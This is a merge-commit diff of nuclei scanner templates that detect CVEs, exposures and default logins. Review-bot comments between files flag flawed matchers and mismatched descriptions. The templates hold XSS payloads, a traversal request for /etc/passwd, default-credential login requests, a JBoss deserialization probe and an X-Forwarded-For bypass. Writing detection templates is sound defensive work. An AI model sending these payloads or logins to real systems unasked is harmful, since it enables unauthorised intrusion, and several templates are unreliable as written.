Merge pull request #51 from projectdiscovery/master

Updation
patch-1
Dhiyaneshwaran 2021-05-16 18:32:39 +05:30 committed by GitHub
commit b90e02d078
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
58 changed files with 720 additions and 178 deletions

View File

@ -1,4 +1,4 @@
name: syntax-checking name: ❄️ YAML Lint
on: [push, pull_request] on: [push, pull_request]

View File

@ -1,4 +1,4 @@
name: "Auto Update README" name: 📝 Readme Update
on: on:
push: push:

View File

@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc
| Templates | Counts | Templates | Counts | Templates | Counts | | Templates | Counts | Templates | Counts | Templates | Counts |
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
| cves | 309 | vulnerabilities | 152 | exposed-panels | 126 | | cves | 311 | vulnerabilities | 153 | exposed-panels | 127 |
| takeovers | 67 | exposures | 96 | technologies | 66 | | takeovers | 67 | exposures | 99 | technologies | 67 |
| misconfiguration | 57 | workflows | 30 | miscellaneous | 20 | | misconfiguration | 62 | workflows | 30 | miscellaneous | 20 |
| default-logins | 24 | exposed-tokens | 0 | dns | 8 | | default-logins | 26 | exposed-tokens | 0 | dns | 8 |
| fuzzing | 8 | helpers | 8 | iot | 11 | | fuzzing | 9 | helpers | 8 | iot | 11 |
**103 directories, 1068 files**. **105 directories, 1085 files**.
</td> </td>
</tr> </tr>

View File

@ -7,7 +7,7 @@ info:
description: Setup script used to generate configuration can be fooled using a crafted POST request to include arbitrary PHP code in generated configuration file. Combined with ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code. description: Setup script used to generate configuration can be fooled using a crafted POST request to include arbitrary PHP code in generated configuration file. Combined with ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
reference: https://www.phpmyadmin.net/security/PMASA-2009-3/ reference: https://www.phpmyadmin.net/security/PMASA-2009-3/
vulhub: https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433 vulhub: https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433
tags: phpmyadmin,rce,deserialization tags: cve,cve2009,phpmyadmin,rce,deserialization
requests: requests:
- raw: - raw:
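
Review bot: In the `info` block the `vulhub:` link points at WooYun-2016-199433 while `reference` and `description` are for PMASA-2009-3, and the changed tag line now puts `cve,cve2009` next to `deserialization` although the description is about PHP code written into the generated configuration file. Confirm which of the two issues the requests detect and make the references and tags agree. `vulhub` is also not a key any other template shown in this commit uses, so the link would sit better as a second `reference` entry.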

View File

@ -10,6 +10,7 @@ info:
- http://packetstormsecurity.com/files/130567/Jetty-9.2.8-Shared-Buffer-Leakage.html - http://packetstormsecurity.com/files/130567/Jetty-9.2.8-Shared-Buffer-Leakage.html
description: | description: |
The exception handling code in Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header, aka JetLeak The exception handling code in Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header, aka JetLeak
tags: cve,cve2015,jetty
requests: requests:
- method: POST - method: POST

39
cves/2017/CVE-2017-12149.yaml Executable file
View File

@ -0,0 +1,39 @@
id: CVE-2017-12149
info:
name: Java/Jboss Deserialization [RCE]
author: fopina
severity: critical
description: In Jboss Application Server as shipped with Red Hat Enterprise Application Platform 5.2, it was found that the doFilter method in the ReadOnlyAccessFilter of the HTTP Invoker does not restrict classes for which it performs deserialization and thus allowing an attacker to execute arbitrary code via crafted serialized data.
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2017-12149
- https://chowdera.com/2020/12/20201229190934023w.html
- https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149
tags: cve,cve2017,java,rce,deserialization
requests:
- raw:
- |
POST /invoker/JMXInvokerServlet/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/octet-stream
{{ base64_decode("rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==") }}
- |
POST /invoker/EJBInvokerServlet/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/octet-stream
{{ base64_decode("rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==") }}
matchers-condition: and
matchers:
- type: word
words:
- "ClassCastException"
part: body
- type: word
words:
- "application/x-java-serialized-object"
part: header
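
Review bot: The description places the flaw in the ReadOnlyAccessFilter of the HTTP Invoker, but the two raw requests go to `/invoker/JMXInvokerServlet/` and `/invoker/EJBInvokerServlet/`; please confirm these paths pass through that filter, otherwise the template reports a different exposure under this CVE id. The matchers (`ClassCastException` in the body, `application/x-java-serialized-object` in the header) only show that the endpoint deserialized the posted object, so the description should say that a `critical` result means an exposed deserializing invoker endpoint.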

View File

@ -1,25 +1,31 @@
id: CVE-2017-7269 id: CVE-2017-7269
info: info:
name: CVE-2017-7269 name: Windows Server 2003 & IIS 6.0 RCE
author: thomas_from_offensity author: thomas_from_offensity & @geeknik
severity: critical severity: critical
description: RCE - Buffer overflow in ScStoragePathFromUrl function (WebDAV service - IIS 6.0) - Windows Server 2003 R2 description: Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning with "If <http://" in a PROPFIND request.
reference: https://github.com/danigargu/explodingcan/blob/master/explodingcan.py reference:
- https://blog.0patch.com/2017/03/0patching-immortal-cve-2017-7269.html
- https://github.com/danigargu/explodingcan/blob/master/explodingcan.py
tags: cve,cve2017,rce
requests: requests:
- method: OPTIONS - method: OPTIONS
path: path:
- "{{BaseURL}}" - "{{BaseURL}}"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: status - type: status
status: status:
- 200 - 200
- type: word - type: word
words: words:
- "IIS/6.0" - "IIS/6.0"
part: header part: header
- type: dsl - type: dsl
dsl: dsl:
- regex("<DAV:sql>", dasl) # lowercase header name: DASL - regex("<DAV:sql>", dasl) # lowercase header name: DASL
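
Review bot: The three matchers (status 200, `IIS/6.0` in the headers, `<DAV:sql>` in the DASL header) fingerprint IIS 6.0 with WebDAV enabled and never exercise the `If <http://` PROPFIND path that the new description talks about, so a patched host that keeps the same headers would still be reported as `critical`. State in the description that this is a version and feature fingerprint. The new `tags: cve,cve2017,rce` line also has no product tag such as `iis`, which other templates in this commit carry (`jetty`, `phpmyadmin`).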

View File

@ -9,7 +9,7 @@ info:
- http://dontpanic.42.nl/2017/12/there-is-proxy-in-your-atlassian.html - http://dontpanic.42.nl/2017/12/there-is-proxy-in-your-atlassian.html
- https://ecosystem.atlassian.net/browse/OAUTH-344 - https://ecosystem.atlassian.net/browse/OAUTH-344
- https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-171018bca2c3 - https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-171018bca2c3
tags: cve,cve2017,atlassian,jira,ssrf tags: cve,cve2017,atlassian,jira,ssrf,oob
requests: requests:
- raw: - raw:

View File

@ -1,62 +0,0 @@
id: CVE-2018-0101
info:
name: Cisco ASA Denial-of-Service # Leads to RCE
author: dwisiswant0
severity: critical
reference: https://www.exploit-db.com/exploits/43986
description: |
A vulnerability in the XML parser of Cisco Adaptive Security Appliance (ASA) Software could allow an unauthenticated,
remote attacker to cause a reload of the affected system or to remotely execute code. It was also possible that
the ASA could stop processing incoming Virtual Private Network (VPN) authentication requests due to a low memory condition.
tags: cve,cve2018,cisco,dos,rce
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
Accept: */*
- |
POST / HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
X-Aggregate-Auth: 1
X-Transcend-Version: 1
Accept-Encoding: identity
X-AnyConnect-Platform: linux-64
X-Support-HTTP-Auth: false
X-Pad: 0000000000000000000000000000000000000000
<?xml version="1.0" encoding="UTF-8"?>
<config-auth client="a" type="a" aggregate-auth-version="a">
<host-scan-reply>A</host-scan-reply>
</config-auth>
- |
GET / HTTP/1.1
Host: {{Hostname}}
Accept: */*
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- "status_code_1 == 200"
- type: dsl
dsl:
- "status_code_2 == 500"
- "status_code_2 == 501"
- "status_code_2 == 502"
- "status_code_2 == 503"
- "status_code_2 == 504"
condition: or
- type: dsl
dsl:
- "status_code_3 == 200"
negative: true
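
Review bot: The deletion of this template is not explained anywhere; the commit message only says "Updation". The removed matchers expect a 5xx on the second request and, through `negative: true` on `status_code_3 == 200`, a third request that no longer returns 200, so a match depended on the target ceasing to answer normally. If that is the reason for dropping it, record it in the message so the template is not re-added later.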

View File

@ -7,7 +7,7 @@ info:
reference: | reference: |
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8770 - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8770
- https://www.exploit-db.com/exploits/44495/ - https://www.exploit-db.com/exploits/44495/
tags: cobub,razor,exposure tags: cve,cve2018,cobub,razor,exposure
requests: requests:
- method: GET - method: GET

View File

@ -4,7 +4,7 @@ info:
author: pussycat0x author: pussycat0x
severity: high severity: high
reference: https://github.com/shi-yang/jnoj/issues/53 reference: https://github.com/shi-yang/jnoj/issues/53
tegs: cve.cve2019,jnoj,lfi tags: cve.cve2019,jnoj,lfi
requests: requests:
- raw: - raw:
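
Review bot: The `tegs` to `tags` fix leaves `cve.cve2019` with a period where the other templates use a comma (`cve,cve2019`), so this template gets a single tag `cve.cve2019` and is missed by a `cve` or `cve2019` tag filter. Change the line to `tags: cve,cve2019,jnoj,lfi`.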

View File

@ -4,6 +4,7 @@ info:
name: Apache Cocoon 2.1.12 XML Injection name: Apache Cocoon 2.1.12 XML Injection
author: pikpikcu author: pikpikcu
severity: high severity: high
tags: cve,cve2020,apache,xml,cocoon
description: | description: |
When using the StreamGenerator, the code parse a user-provided XML. A specially crafted XML, including external system entities, could be used to access any file on the server system. When using the StreamGenerator, the code parse a user-provided XML. A specially crafted XML, including external system entities, could be used to access any file on the server system.
reference: https://lists.apache.org/thread.html/r77add973ea521185e1a90aca00ba9dae7caa8d8b944d92421702bb54%40%3Cusers.cocoon.apache.org%3E reference: https://lists.apache.org/thread.html/r77add973ea521185e1a90aca00ba9dae7caa8d8b944d92421702bb54%40%3Cusers.cocoon.apache.org%3E

View File

@ -18,7 +18,7 @@ requests:
- type: word - type: word
words: words:
- "{alert(document.domain);}" - "function(handler){};function __MobileAppList(test){alert(document.domain);};//</div>"
part: body part: body
- type: word - type: word

View File

@ -11,7 +11,7 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/?key=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E' - '{{BaseURL}}/?key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss%27%29%3E'
matchers-condition: and matchers-condition: and
matchers: matchers:
@ -26,5 +26,5 @@ requests:
- type: word - type: word
words: words:
- '"><script>alert(document.domain);</script>' - "'>\"<svg/onload=confirm('xss')>"
part: body part: body

View File

@ -26,4 +26,4 @@ requests:
part: body part: body
group: 1 group: 1
regex: regex:
- "<h1 class=\"p\">PHP Version ([0-9.]+)<\/h1>" - '<h1 class=\"p\">PHP Version ([0-9.]+)<\/h1>'
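
Review bot: Switching the regex to single quotes makes the backslashes in `\"` and `\/` literal, so they are now passed to the regex engine instead of being consumed by YAML. Neither character needs escaping in the pattern; `'<h1 class="p">PHP Version ([0-9.]+)</h1>'` is the same match and easier to read.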

View File

@ -6,7 +6,7 @@ info:
severity: medium severity: medium
description: An email address enumeration vulnerability exists in the password reset function of Rocket.Chat through 3.9.1. description: An email address enumeration vulnerability exists in the password reset function of Rocket.Chat through 3.9.1.
reference: https://trovent.io/security-advisory-2010-01 reference: https://trovent.io/security-advisory-2010-01
tags: rockethchat tags: cve,cve2020,rockethchat
requests: requests:
- raw: - raw:
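
Review bot: The tag is still spelled `rockethchat` on the changed line, so the template will not be selected by a `rocketchat` tag filter. Fix the spelling while the line is being edited: `tags: cve,cve2020,rocketchat`.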

View File

@ -11,7 +11,7 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/Pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E" - "{{BaseURL}}/pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E"
matchers-condition: and matchers-condition: and
matchers: matchers:
@ -25,3 +25,7 @@ requests:
words: words:
- '<img src="" onerror="alert(1);">1</img>' - '<img src="" onerror="alert(1);">1</img>'
part: body part: body
- type: status
status:
- 200
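
Review bot: The first hunk replaces `/Pacs/login.php` with `/pacs/login.php` instead of adding it, so any deployment that served the capitalised path is no longer checked. If both spellings occur, list both under `path`; if the old one was simply wrong, say so in the commit message.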

View File

@ -4,7 +4,7 @@ info:
author: princechaddha author: princechaddha
severity: critical severity: critical
reference: https://www.openwall.com/lists/oss-security/2020/01/28/3 reference: https://www.openwall.com/lists/oss-security/2020/01/28/3
tags: cve,cve2020,smtp,opensmtpd,network,rce tags: cve,cve2020,smtp,opensmtpd,network,rce,oob
network: network:
- inputs: - inputs:

View File

@ -0,0 +1,41 @@
id: CVE-2021-27651
info:
name: Pega Infinity Authentication bypass
author: idealphase
description: In versions 8.2.1 through 8.5.2 of Pega Infinity, the password reset functionality for local accounts can be used to bypass local authentication checks.
reference: |
- https://github.com/samwcyo/CVE-2021-27651-PoC/blob/main/RCE.md
- https://nvd.nist.gov/vuln/detail/CVE-2021-27651
severity: critical
tags: cve,cve2021,pega,auth-bypass
requests:
- method: GET
path:
- "{{BaseURL}}/prweb/PRAuth/app/default/"
cookie-reuse: true
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "Pega Infinity"
part: body
- type: regex
regex:
- 'Pega 8\.(?:2\.[1-9]|3\.[0-9]|4\.[0-9]|5\.[0-2])'
part: body
extractors:
- type: regex
regex:
- 'Pega 8\.(?:2\.[1-9]|3\.[0-9]|4\.[0-9]|5\.[0-2])'
part: body
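
Review bot: Both the regex matcher and the extractor use `Pega 8\.(?:2\.[1-9]|3\.[0-9]|4\.[0-9]|5\.[0-2])` with nothing after the last digit, so the pattern matches on a prefix: a banner such as "Pega 8.5.20" satisfies `5\.[0-2]` even though the description limits the issue to 8.2.1 through 8.5.2. End the pattern with a non-digit check such as `(?:[^0-9]|$)`. The template also never touches the password reset function, so `critical` is assigned on a version string alone and the description should state that.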

View File

@ -0,0 +1,28 @@
id: CVE-2021-31537
info:
name: SIS-REWE GO version 7.5.0/12C XSS
author: geeknik
description: SIS SIS-REWE Go before 7.7 SP17 allows XSS -- rewe/prod/web/index.php (affected parameters are config, version, win, db, pwd, and user) and /rewe/prod/web/rewe_go_check.php (version and all other parameters).
reference: https://sec-consult.com/vulnerability-lab/advisory/reflected-xss-sis-infromatik-rewe-go-cve-2021-31537/
severity: medium
tags: cve,cve2021,xss
requests:
- method: GET
path:
- "{{BaseURL}}/rewe/prod/web/rewe_go_check.php?config=rewe&version=7.5.0%3cscript%3econfirm({{randstr}})%3c%2fscript%3e&win=2707"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<script>confirm({{randstr}})</script>"
- "SIS-REWE"
condition: and
- type: word
part: header
words:
- "text/html"

View File

@ -0,0 +1,23 @@
id: CVE-2021-31800
info:
name: Impacket directory traversal
author: geeknik
description: Multiple path traversal vulnerabilities exist in smbserver.py in Impacket through 0.9.22. An attacker that connects to a running smbserver instance can list and write to arbitrary files via ../ directory traversal. This could potentially be abused to achieve arbitrary code execution by replacing /etc/shadow or an SSH authorized key.
reference: https://github.com/SecureAuthCorp/impacket/pull/1066
severity: high
tags: impacket,cve,cve2021,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
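
Review bot: The description is about smbserver.py, reached by an attacker who "connects to a running smbserver instance", but the request is an HTTP `GET` for `{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd`. As written the template tests a web server for path traversal and reports the result under CVE-2021-31800; either the check belongs in a `network` template that speaks SMB, or the id and description need to name what the HTTP request really detects. The `lfi` tag has the same mismatch, since the description speaks of listing and writing files.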

View File

@ -0,0 +1,45 @@
id: panabit-gateway-defalut-password
info:
name: Panabit Default Password
author: pikpikcu
severity: high
reference: https://max.book118.com/html/2017/0623/117514590.shtm
tags: panabit,default-login
requests:
- raw:
- |
POST /login/userverify.cgi HTTP/1.1
Host: {{Hostname}}
Content-Length: 246
Origin: {{BaseURL}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAjZMsILtbrBp8VbC
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
Referer: {{BaseURL}}/login/login.htm
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close
------WebKitFormBoundaryAjZMsILtbrBp8VbC
Content-Disposition: form-data; name="username"
admin
------WebKitFormBoundaryAjZMsILtbrBp8VbC
Content-Disposition: form-data; name="password"
panabit
------WebKitFormBoundaryAjZMsILtbrBp8VbC--
matchers-condition: and
matchers:
- type: word
words:
- '<META HTTP-EQUIV=REFRESH CONTENT="0;URL=/index.htm">'
- 'urn:schemas-microsoft-com:vml'
part: body
condition: and
- type: status
status:
- 200
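
Review bot: The id is misspelled `panabit-gateway-defalut-password`; ids are awkward to change once reports and filters reference them, so correct it to `default` before merge. In the raw request, `Content-Length: 246` is hard-coded next to a hand-written multipart body, so any edit to the body or its line endings desynchronises the two; drop the fixed value if the engine fills the header in, or add a comment saying how 246 was derived.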

View File

@ -0,0 +1,31 @@
id: showdoc-default-password
info:
name: Showdoc Default Password
author: pikpikcu
severity: medium
reference: |
- https://blog.star7th.com/2016/05/2007.html
tags: showdoc,default-login
requests:
- method: POST
path:
- "{{BaseURL}}/server/index.php?s=/api/user/login"
body: |
username=showdoc&password=123456&v_code=
headers:
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
matchers-condition: and
matchers:
- type: word
words:
- '"username":"showdoc"'
- '"user_token":'
condition: and
- type: status
status:
- 200

View File

@ -0,0 +1,24 @@
id: microsoft-exchange-control-panel
info:
name: Microsoft Exchange Control Panel
author: r3dg33k
severity: info
description: Publicly accessible Microsoft Exchange Server Control Panel
tags: microsoft,panel
reference: https://docs.microsoft.com/en-us/answers/questions/58814/block-microsoft-exchange-server-2016-exchange-admi.html
requests:
- method: GET
path:
- "{{BaseURL}}/owa/auth/logon.aspx?replaceCurrent=1&url={{BaseURL}}/ecp"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'Exchange Admin Center'

View File

@ -1,4 +1,5 @@
id: tomcat-manager-pathnormalization id: tomcat-manager-pathnormalization
info: info:
name: Tomcat Manager Path Normalization name: Tomcat Manager Path Normalization
author: organiccrap author: organiccrap
@ -11,11 +12,17 @@ requests:
path: path:
- '{{BaseURL}}/..;/manager/html' - '{{BaseURL}}/..;/manager/html'
- '{{BaseURL}}/..;/host-manager/html' - '{{BaseURL}}/..;/host-manager/html'
headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 matchers-condition: and
matchers: matchers:
- type: word - type: word
words: words:
- username="tomcat" password="s3cret" - 'username="tomcat" password="s3cret"'
- manager-gui - 'manager-gui'
condition: and condition: and
- type: status
status:
- 403
- 401
negative: true
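
Review bot: The new negated status matcher excludes 401 and 403, while the word matcher still requires both `username="tomcat" password="s3cret"` and `manager-gui`, which is the sample tomcat-users snippet that Tomcat prints on its manager access-denied pages. Please confirm against a real instance that a response can carry that text with another status code; otherwise the two matchers under `matchers-condition: and` cancel out and the template never fires.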

View File

@ -0,0 +1,54 @@
id: php-backup-files
info:
name: PHP source disclosure through backup files
author: StreetOfHackerR007 (Rohit Soni)
severity: medium
tags: exposure,backup,php
requests:
- method: GET
path:
- "{{BaseURL}}/index.php.bak"
- "{{BaseURL}}/default.php.bak"
- "{{BaseURL}}/main.php.bak"
- "{{BaseURL}}/config.php.bak"
- "{{BaseURL}}/settings.php.bak"
- "{{BaseURL}}/header.php.bak"
- "{{BaseURL}}/footer.php.bak"
- "{{BaseURL}}/login.php.bak"
- "{{BaseURL}}/database.php.bak"
- "{{BaseURL}}/db.php.bak"
- "{{BaseURL}}/conn.php.bak"
- "{{BaseURL}}/db_config.php.bak"
- "{{BaseURL}}/404.php.bak"
- "{{BaseURL}}/wp-config.php.bak"
- "{{BaseURL}}/wp-login.php.bak"
redirects: true
max-redirects: 1
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<?php"
- "<?="
condition: or
part: body
- type: word
words:
- "?>"
part: body
- type: word
words:
- "text/plain"
- "bytes"
part: header
condition: or
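
Review bot: In the last matcher, the header word `bytes` under `condition: or` is satisfied by any response that sends `Accept-Ranges: bytes`, so the header check adds almost nothing and `text/plain` is effectively optional. That leaves `<?php` or `<?=` plus `?>` in the body to decide, and an HTML page that quotes PHP code would be reported as a source leak. Match on the Content-Type value specifically and add a negative matcher for `text/html`.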

View File

@ -5,7 +5,9 @@ info:
severity: medium severity: medium
description: Nginx off-by-slash vulnerability exposes Git configuration. description: Nginx off-by-slash vulnerability exposes Git configuration.
tags: config,exposure tags: config,exposure
reference: https://twitter.com/Random_Robbie/status/1262676628167110656 reference: |
- https://twitter.com/Random_Robbie/status/1262676628167110656
- https://github.com/PortSwigger/nginx-alias-traversal/blob/master/off-by-slash.py
requests: requests:
- method: GET - method: GET
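
Review bot: `reference: |` turns the value into one multi-line string whose lines happen to start with `- `, not a YAML list. The CVE-2017-7269 template in this same commit writes `reference:` followed by list items; use that form here so anything that reads references gets one URL per entry.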

View File

@ -17,7 +17,6 @@ requests:
- "{{BaseURL}}/.env.prod.local" - "{{BaseURL}}/.env.prod.local"
- "{{BaseURL}}/.env.production.local" - "{{BaseURL}}/.env.production.local"
- "{{BaseURL}}/.env.local" - "{{BaseURL}}/.env.local"
- "{{BaseURL}}/.env.example"
- "{{BaseURL}}/.env.stage" - "{{BaseURL}}/.env.stage"
- "{{BaseURL}}/.env.live" - "{{BaseURL}}/.env.live"
matchers-condition: and matchers-condition: and

View File

@ -0,0 +1,25 @@
id: ruijie-phpinfo
info:
name: Ruijie Phpinfo
author: pikpikcu
severity: low
reference: https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20phpinfo.view.php%20%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md
tags: phpinfo,rujjie,config,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/tool/view/phpinfo.view.php"
matchers-condition: and
matchers:
- type: word
words:
- "PHP Version"
- "PHP Extension"
condition: and
- type: status
status:
- 200
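
Review bot: The tag `rujjie` does not match the id `ruijie-phpinfo` or the name "Ruijie Phpinfo", so a tag filter on the vendor name will skip this template. Change the line to `tags: phpinfo,ruijie,config,exposure`.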

View File

@ -0,0 +1,47 @@
id: xff-403-bypass
info:
name: X-Forwarded-For 403-forbidden bypass
author: vavkamil
severity: info
description: Template to detect 403 forbidden endpoint bypass behind Nginx/Apache proxy & load balancers, based on X-Forwarded-For header.
tags: xff,bypass,fuzz
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
- |
GET / HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
X-Forwarded-For: 127.0.0.1, 0.0.0.0, 192.168.0.1, 10.0.0.1, 172.16.0.1
- |
GET /test.txt HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
X-Forwarded-For: 127.0.0.1, 0.0.0.0, 192.168.0.1, 10.0.0.1, 172.16.0.1
req-condition: true
matchers:
- type: dsl
dsl:
- "status_code_1 == 403 && status_code_2 != 403"
- "status_code_1 == 403 && status_code_3 != 403"
condition: or
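
Review bot: The second DSL expression compares `status_code_1`, the answer for `GET /`, with `status_code_3`, the answer for `GET /test.txt`, so a site that returns 403 for `/` and 404 for a missing `/test.txt` is reported as a bypass. `!= 403` has the same weakness in the first expression, where a 5xx or a redirect also counts. Add a baseline request for `/test.txt` without the X-Forwarded-For header and require a success code on the bypass side, for example `status_code_2 == 200`.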

View File

@ -0,0 +1,29 @@
id: apache-filename-brute-force
info:
name: Apache Filename Brute Force
author: geeknik
description: If the client provides an invalid Accept header, the server will respond with a 406 Not Acceptable error containing a pseudo directory listing.
reference: |
- https://hackerone.com/reports/210238
- https://www.acunetix.com/vulnerabilities/web/apache-mod_negotiation-filename-bruteforcing/
severity: low
tags: apache
requests:
- method: GET
headers:
Accept: "fake/value"
path:
- "{{BaseURL}}/index"
matchers-condition: and
matchers:
- type: status
status:
- 406
- type: word
words:
- "Not Acceptable"
- "Available variants:"
- "<address>Apache Server at"
condition: and

View File

@ -0,0 +1,25 @@
id: cloudflare-external-image-resize
info:
name: Cloudflare External Image Resizing Misconfiguration
author: vavkamil
severity: info
description: Cloudflare Image Resizing defaults to restricting resizing to the same domain. This prevents third parties from resizing any image at any origin. However, you can enable this option if you check Resize images from any origin.
reference: https://support.cloudflare.com/hc/en-us/articles/360028146432-Understanding-Cloudflare-Image-Resizing#12345684
tags: cloudflare,misconfig,oob
requests:
- raw:
- |
GET /cdn-cgi/image/width/https://{{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Connection: close
Accept: */*
Accept-Language: en
matchers:
- type: word
part: interactsh_protocol
words:
- "http"

View File

@ -5,6 +5,7 @@ info:
author: that_juan_ & dwisiswant0 & wdahlenb author: that_juan_ & dwisiswant0 & wdahlenb
severity: low severity: low
description: Sensitive environment variables may not be masked description: Sensitive environment variables may not be masked
tags: springboot,disclosure
requests: requests:
- method: GET - method: GET

View File

@ -3,8 +3,9 @@ id: springboot-env
info: info:
name: Detect Springboot Env Actuator name: Detect Springboot Env Actuator
author: that_juan_ & dwisiswant0 & wdahlenb author: that_juan_ & dwisiswant0 & wdahlenb
severity: high severity: low
description: Sensitive environment variables may not be masked description: Sensitive environment variables may not be masked
tags: springboot,disclosure
requests: requests:
- method: GET - method: GET
@ -17,8 +18,14 @@ requests:
part: body part: body
words: words:
- "applicationConfig" - "applicationConfig"
- type: word
part: body
words:
- "server.port"
- "local.server.port" - "local.server.port"
condition: and condition: or
- type: status - type: status
status: status:
- 200 - 200
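
Review bot: The first hunk lowers `severity` from `high` to `low` while the description still reads "Sensitive environment variables may not be masked", and the second hunk loosens the port matcher from `condition: and` to `condition: or`. None of the matchers check whether values are masked, so either reword the description to say the template reports endpoint exposure only, or keep the higher severity and add a matcher that looks for unmasked values.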

View File

@ -5,12 +5,15 @@ info:
author: that_juan_ & dwisiswant0 & wdahlenb author: that_juan_ & dwisiswant0 & wdahlenb
severity: critical severity: critical
description: Environment variables and HTTP requests can be found in the HPROF description: Environment variables and HTTP requests can be found in the HPROF
tags: springboot,disclosure
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/heapdump" - "{{BaseURL}}/heapdump"
- "{{BaseURL}}/actuator/heapdump" - "{{BaseURL}}/actuator/heapdump"
max-size: 2097152 # 2MB - Max Size to read from server response
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: binary - type: binary
@ -20,16 +23,19 @@ requests:
- "4850524f46" # "HPROF" - "4850524f46" # "HPROF"
- "1f8b080000000000" # Gunzip magic byte - "1f8b080000000000" # Gunzip magic byte
condition: or condition: or
- type: status - type: status
status: status:
- 200 - 200
- type: word - type: word
words: words:
- "application/octet-stream" - "application/octet-stream"
- "application/vnd.spring-boot.actuator" - "application/vnd.spring-boot.actuator"
- "application/vnd.spring-boot.actuator.v1+json" - "application/vnd.spring-boot.actuator.v1+json"
condition: or
part: header part: header
condition: or
- type: dsl - type: dsl
dsl: dsl:
- "len(body) >= 100000" - "len(body) >= 100000"

View File

@ -5,6 +5,7 @@ info:
author: that_juan_ & dwisiswant0 & wdahlenb author: that_juan_ & dwisiswant0 & wdahlenb
severity: low severity: low
description: View recent HTTP requests and responses description: View recent HTTP requests and responses
tags: springboot,disclosure
requests: requests:
- method: GET - method: GET

View File

@ -4,6 +4,7 @@ info:
name: Detect Springboot Loggers name: Detect Springboot Loggers
author: that_juan_ & dwisiswant0 & wdahlenb author: that_juan_ & dwisiswant0 & wdahlenb
severity: low severity: low
tags: springboot,disclosure
requests: requests:
- method: GET - method: GET

View File

